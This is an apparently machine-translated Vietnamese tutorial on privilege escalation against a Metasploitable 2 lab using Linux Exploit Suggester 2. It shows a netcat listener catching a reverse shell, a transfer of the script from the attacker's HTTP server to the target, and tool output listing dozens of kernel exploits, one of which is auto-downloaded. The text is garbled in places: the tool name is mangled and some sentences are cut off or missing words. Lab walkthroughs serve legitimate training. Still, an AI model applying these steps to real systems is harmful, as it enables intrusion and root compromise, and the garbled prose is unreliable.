Với một cảnh quan thay đổi liên tục và rất nhiều khai thác ngoài kia, nó có thể là một khía cạnh có vấn đề của bất kỳ cuộc tấn công nào. May mắn thay, một số công cụ có thể giúp đẩy nhanh quá trình. Linux Khai thác Suggester chỉ là một trong nhiều để giúp bạn root.
vì nó cho phép chúng làm những việc mà một người dùng bình thường sẽ không thể làm được. Trừ khi hệ thống được cấu hình kém, người dùng tiêu chuẩn thường không thể thực thi mã độc hoặc định cấu hình hệ thống theo những cách ấn tượng có lợi cho kẻ tấn công. Đó là lý do tại sao đặc quyền là rất quan trọng cho sự thỏa hiệp hoàn toàn của một mục tiêu.
Bước 1 Cài đặt & Thỏa hiệp ban đầu
Để bắt đầu, chúng tôi đang sử dụng Metasploitable 2 làm mục tiêu và Kali Linux là máy cục bộ của chúng tôi. Bạn có thể sử dụng một thiết lập tương tự. Khi sẵn sàng, chúng tôi cần tải xuống Linux Miningit Suggester từ GitHub .
Giả sử rằng mục tiêu đã hạn chế quyền truy cập vào internet, vì vậy chúng tôi cần có nó trên máy cục bộ của chúng tôi trước và chuyển nó đến mục tiêu sau. Chúng tôi có thể sử dụng wget để tải tập lệnh trực tiếp từ thiết bị đầu cuối :
~# wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
--2020-02-18 12:15:58-- https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24780 (24K) [text/plain]
Saving to: ‘linux-exploit-suggester-2.pl’
linux-exploit-suggester-2.pl 100%[======================================================================================================================>] 24.20K --.-KB/s in 0.03s
2020-02-18 12:15:58 (718 KB/s) - ‘linux-exploit-suggester-2.pl’ saved [24780/24780]
Bây giờ chúng ta sẽ cần phải thỏa hiệp mục tiêu và có quyền truy cập shell. Lệnh luôn là một lựa chọn thú vị. Sau đó, khi chúng tôi bắt được kết nối đến, chúng tôi có thể xác minh rằng chúng tôi là người dùng dữ liệu www bằng lệnh id :
~# nc -lvnp 4321
listening on [any] 4321 ...
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 36302
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Từ đây, chúng tôi sẽ muốn nâng cấp lên trình bao TTY tương tác đầy đủ để chúng tôi có nhiều quyền kiểm soát hơn và có thể sử dụng hoàn thành tab, lịch sử lệnh, v.v. Khi chúng tôi đã nâng cấp trình bao của mình, chúng tôi có thể điều hướng đến thư mục có thể ghi trên thế giới và cuối cùng chạy công cụ:
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /dev/shm
Bước 2 Chuyển Script sang Target
Quay lại máy cục bộ của chúng tôi, hãy đổi tên tập lệnh thành một cái gì đó ngắn hơn:
~# mv linux-exploit-suggester-2.pl les2.pl
Bây giờ chúng ta có thể phục vụ tập lệnh với mô-đun Simple HTTPServer của Python – sử dụng khóa -m để chỉ định mô-đun:
~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Điều đó sẽ phục vụ bất kỳ nội dung nào trong thư mục qua HTTP trên cổng 8000.
Quay lại mục tiêu, chúng ta có thể sử dụng wget một lần nữa để lấy tập lệnh từ máy cục bộ của mình:
www-data@metasploitable:/dev/shm$ wget http://10.10.0.1:8000/les2.pl
--13:43:17-- http://10.10.0.1:8000/les2.pl
=> `les2.pl'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24,780 (24K) [text/x-perl]
100%[=========================================================================================================================================================================>] 24,780 --.--K/s
13:43:18 (70.47 MB/s) - `les2.pl' saved [24780/24780]
Khi hoàn thành, chúng ta có thể giết máy chủ Python. Bây giờ chúng ta có thể xem các quyền hiện tại của tập lệnh mà chúng ta vừa chuyển qua:
www-data@metasploitable:/dev/shm$ ls -la
total 28
drwxrwxrwt 2 root root 60 Jun 19 13:43 .
drwxr-xr-x 13 root root 13480 Jun 19 13:28 ..
-rw-r--r-- 1 www-data www-data 24780 Feb 18 2020 les2.pl
Chúng ta có thể thấy rằng nó chỉ đọc ở thời điểm này, vì vậy hãy sử dụng lệnh chmod để làm cho nó có thể thực thi được:
www-data@metasploitable:/dev/shm$ chmod +x les2.pl
Cuối cùng, tất cả chúng ta đã sẵn sàng để chạy tập lệnh.
Bước 3 Chạy Linux Suggester
Vì chúng tôi đã làm cho nó có thể thực thi được, chúng tôi có thể sử dụng dấu gạch chéo để chạy Linux Khai thác Suggester. Sử dụng cờ -h để xem menu trợ giúp và ví dụ sử dụng:
www-data@metasploitable:/dev/shm$ ./les2.pl -h
#############################
Linux Exploit Suggester 2
#############################
Usage: ./les2.pl [-h] [-k kernel] [-d]
[-h] Help (this message)
[-k] Kernel number (eg. 2.6.28)
[-d] Open exploit download menu
You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.
Cách cơ bản nhất để sử dụng công cụ là chạy nó mà không có bất kỳ tùy chọn nào:
www-data@metasploitable:/dev/shm$ ./les2.pl
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6.24
Searching 72 exploits...
Possible Exploits
[1] american-sign-language
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[4] do_pages_move
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[5] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[6] half_nelson1
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[7] half_nelson2
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[8] half_nelson3
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[9] msr
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[10] pipe.c_32bit
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[11] pktcdvd
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[12] reiserfs
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[13] sock_sendpage
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[14] sock_sendpage2
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[15] video4linux
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[16] vmsplice1
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[17] vmsplice2
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093
Linux Miningit Suggester hoạt động bằng cách lấy phiên bản kernel và so sánh nó với một danh sách các khai thác có thể. Ở trên, chúng ta có thể thấy nó đã trả về một số khai thác tiềm năng, liệt kê tên tương ứng, số CVE và liên kết đến nguồn.
Chúng ta cũng có thể sử dụng khóa -k để chỉ định phiên bản kernel theo cách thủ công. Hãy xác nhận số kernel bằng lệnh uname -r :
www-data@metasploitable:/dev/shm$ uname -r
2.6.24-16-server
Thay vì sử dụng số phiên bản chính xác, chúng tôi có thể cắt nó thành 2.6 vì các hệ thống thường có thể dễ bị tổn thương trước các khai thác cũ hơn một chút:
www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6
Searching 72 exploits...
Possible Exploits
[1] american-sign-language (2.6.0)
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm (2.6.18)
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] caps_to_root (2.6.34)
CVE-n/a
Source: http://www.exploit-db.com/exploits/15916
[4] dirty_cow (2.6.22)
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[5] do_pages_move (2.6.18)
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[6] elfcd (2.6.12)
[7] exit_notify (2.6.25)
Source: http://www.exploit-db.com/exploits/8369
[8] exp.sh (2.6.9)
[9] exploit_x (2.6.22)
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[10] ftrex (2.6.11)
CVE-2008-4210
Source: http://www.exploit-db.com/exploits/6851
[11] h00lyshit (2.6.8)
CVE-2006-3626
Source: http://www.exploit-db.com/exploits/2013
[12] half_nelson1 (2.6.0)
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[13] half_nelson2 (2.6.0)
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[14] half_nelson3 (2.6.0)
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[15] kdump (2.6.13)
[16] krad (2.6.5)
[17] krad3 (2.6.5)
Source: http://exploit-db.com/exploits/1397
[18] local26 (2.6.13)
[19] memodipper (2.6.39)
CVE-2012-0056
Source: http://www.exploit-db.com/exploits/18411
[20] msr (2.6.18)
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[21] newsmp (2.6)
[22] ong_bak (2.6.5)
[23] pipe.c_32bit (2.6.15)
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[24] pktcdvd (2.6.0)
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[25] prctl (2.6.13)
Source: http://www.exploit-db.com/exploits/2004
[26] prctl2 (2.6.13)
Source: http://www.exploit-db.com/exploits/2005
[27] prctl3 (2.6.13)
Source: http://www.exploit-db.com/exploits/2006
[28] prctl4 (2.6.13)
Source: http://www.exploit-db.com/exploits/2011
[29] ptrace_kmod2 (2.6.26)
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[30] pwned (2.6.11)
[31] py2 (2.6.9)
[32] raptor_prctl (2.6.13)
CVE-2006-2451
Source: http://www.exploit-db.com/exploits/2031
[33] rawmodePTY (2.6.31)
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[34] rds (2.6.30)
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
[35] reiserfs (2.6.18)
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[36] sctp (2.6.26)
CVE-2008-4113
[37] semtex (2.6.37)
CVE-2013-2094
Source: http://www.exploit-db.com/exploits/25444
[38] sock_sendpage (2.6.0)
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[39] sock_sendpage2 (2.6.0)
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[40] stackgrow2 (2.6.10)
[41] udev (2.6.25)
Alt: udev <1.4.1 CVE-2009-1185
Source: http://www.exploit-db.com/exploits/8478
[42] udp_sendmsg_32bit (2.6.1)
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[43] uselib24 (2.6.10)
[44] vconsole (2.6)
CVE-2009-1046
[45] video4linux (2.6.0)
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[46] vmsplice1 (2.6.17)
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[47] vmsplice2 (2.6.23)
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093
Chúng ta có thể thấy rằng nó đã cho chúng ta một nhóm khai thác lớn hơn nhiều.
Tùy chọn cuối cùng mà Linux Miningit Suggester cung cấp là khả năng tự động tải xuống các tập lệnh khai thác cho bất kỳ trận đấu nào nó tìm thấy. Sử dụng cờ -d để bật tùy chọn:
www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6 -d
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 2.6
Searching 72 exploits...
Possible Exploits
[1] american-sign-language (2.6.0)
CVE-2010-4347
Source: http://www.securityfocus.com/bid/45408
[2] can_bcm (2.6.18)
CVE-2010-2959
Source: http://www.exploit-db.com/exploits/14814
[3] caps_to_root (2.6.34)
CVE-n/a
Source: http://www.exploit-db.com/exploits/15916
[4] dirty_cow (2.6.22)
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[5] do_pages_move (2.6.18)
Alt: sieve CVE-2010-0415
Source: Spenders Enlightenment
[6] elfcd (2.6.12)
[7] exit_notify (2.6.25)
Source: http://www.exploit-db.com/exploits/8369
[8] exp.sh (2.6.9)
[9] exploit_x (2.6.22)
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[10] ftrex (2.6.11)
CVE-2008-4210
Source: http://www.exploit-db.com/exploits/6851
[11] h00lyshit (2.6.8)
CVE-2006-3626
Source: http://www.exploit-db.com/exploits/2013
[12] half_nelson1 (2.6.0)
Alt: econet CVE-2010-3848
Source: http://www.exploit-db.com/exploits/17787
[13] half_nelson2 (2.6.0)
Alt: econet CVE-2010-3850
Source: http://www.exploit-db.com/exploits/17787
[14] half_nelson3 (2.6.0)
Alt: econet CVE-2010-4073
Source: http://www.exploit-db.com/exploits/17787
[15] kdump (2.6.13)
[16] krad (2.6.5)
[17] krad3 (2.6.5)
Source: http://exploit-db.com/exploits/1397
[18] local26 (2.6.13)
[19] memodipper (2.6.39)
CVE-2012-0056
Source: http://www.exploit-db.com/exploits/18411
[20] msr (2.6.18)
CVE-2013-0268
Source: http://www.exploit-db.com/exploits/27297
[21] newsmp (2.6)
[22] ong_bak (2.6.5)
[23] pipe.c_32bit (2.6.15)
CVE-2009-3547
Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[24] pktcdvd (2.6.0)
CVE-2010-3437
Source: http://www.exploit-db.com/exploits/15150
[25] prctl (2.6.13)
Source: http://www.exploit-db.com/exploits/2004
[26] prctl2 (2.6.13)
Source: http://www.exploit-db.com/exploits/2005
[27] prctl3 (2.6.13)
Source: http://www.exploit-db.com/exploits/2006
[28] prctl4 (2.6.13)
Source: http://www.exploit-db.com/exploits/2011
[29] ptrace_kmod2 (2.6.26)
Alt: ia32syscall,robert_you_suck CVE-2010-3301
Source: http://www.exploit-db.com/exploits/15023
[30] pwned (2.6.11)
[31] py2 (2.6.9)
[32] raptor_prctl (2.6.13)
CVE-2006-2451
Source: http://www.exploit-db.com/exploits/2031
[33] rawmodePTY (2.6.31)
CVE-2014-0196
Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
[34] rds (2.6.30)
CVE-2010-3904
Source: http://www.exploit-db.com/exploits/15285
[35] reiserfs (2.6.18)
CVE-2010-1146
Source: http://www.exploit-db.com/exploits/12130
[36] sctp (2.6.26)
CVE-2008-4113
[37] semtex (2.6.37)
CVE-2013-2094
Source: http://www.exploit-db.com/exploits/25444
[38] sock_sendpage (2.6.0)
Alt: wunderbar_emporium CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9435
[39] sock_sendpage2 (2.6.0)
Alt: proto_ops CVE-2009-2692
Source: http://www.exploit-db.com/exploits/9436
[40] stackgrow2 (2.6.10)
[41] udev (2.6.25)
Alt: udev <1.4.1 CVE-2009-1185
Source: http://www.exploit-db.com/exploits/8478
[42] udp_sendmsg_32bit (2.6.1)
CVE-2009-2698
Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
[43] uselib24 (2.6.10)
[44] vconsole (2.6)
CVE-2009-1046
[45] video4linux (2.6.0)
CVE-2010-3081
Source: http://www.exploit-db.com/exploits/15024
[46] vmsplice1 (2.6.17)
Alt: jessica biel CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5092
[47] vmsplice2 (2.6.23)
Alt: diane_lane CVE-2008-0600
Source: http://www.exploit-db.com/exploits/5093
Exploit Download
(Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
Select exploits to download:
Sau khi nó xác định các khai thác tiềm năng, chúng tôi được cung cấp một tùy chọn để tải xuống tất cả các tập lệnh hoặc tập lệnh riêng lẻ. Ví dụ: nếu chúng tôi muốn tải xuống khai thác udev , chúng tôi chỉ cần nhập ID số tương ứng của nó:
Exploit Download
(Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
Select exploits to download: 41
Downloading https://www.exploit-db.com/raw/8478 -> exploit_udev
Hãy nhớ rằng, tính năng này yêu cầu kết nối internet hoạt động, vì vậy nếu quyền truy cập bị hạn chế dưới bất kỳ hình thức nào, nó sẽ không hoạt động. Tuy nhiên, Linux Miningit Suggester giúp việc lấy tập lệnh khai thác đúng mục tiêu trở nên cực kỳ dễ dàng. Từ thời điểm này, nó chỉ là vấn đề đặc quyền để có được root.
Kết thúc
Trong hướng dẫn này, một công cụ có tên là Linux Miningit Suggester. Chúng tôi bắt đầu với một sự thỏa hiệp ban đầu và chuyển kịch bản đến mục tiêu. Sau đó chúng tôi đã có thể chạy nó và bao gồm một số tùy chọn sử dụng của nó để khám phá các khai thác có thể có thể được sử dụng để lấy root. một phần không thể thiếu trong bất kỳ phương pháp nào của hacker và Linux Khai thác Suggester chỉ là một công cụ hỗ trợ cho mục tiêu đó.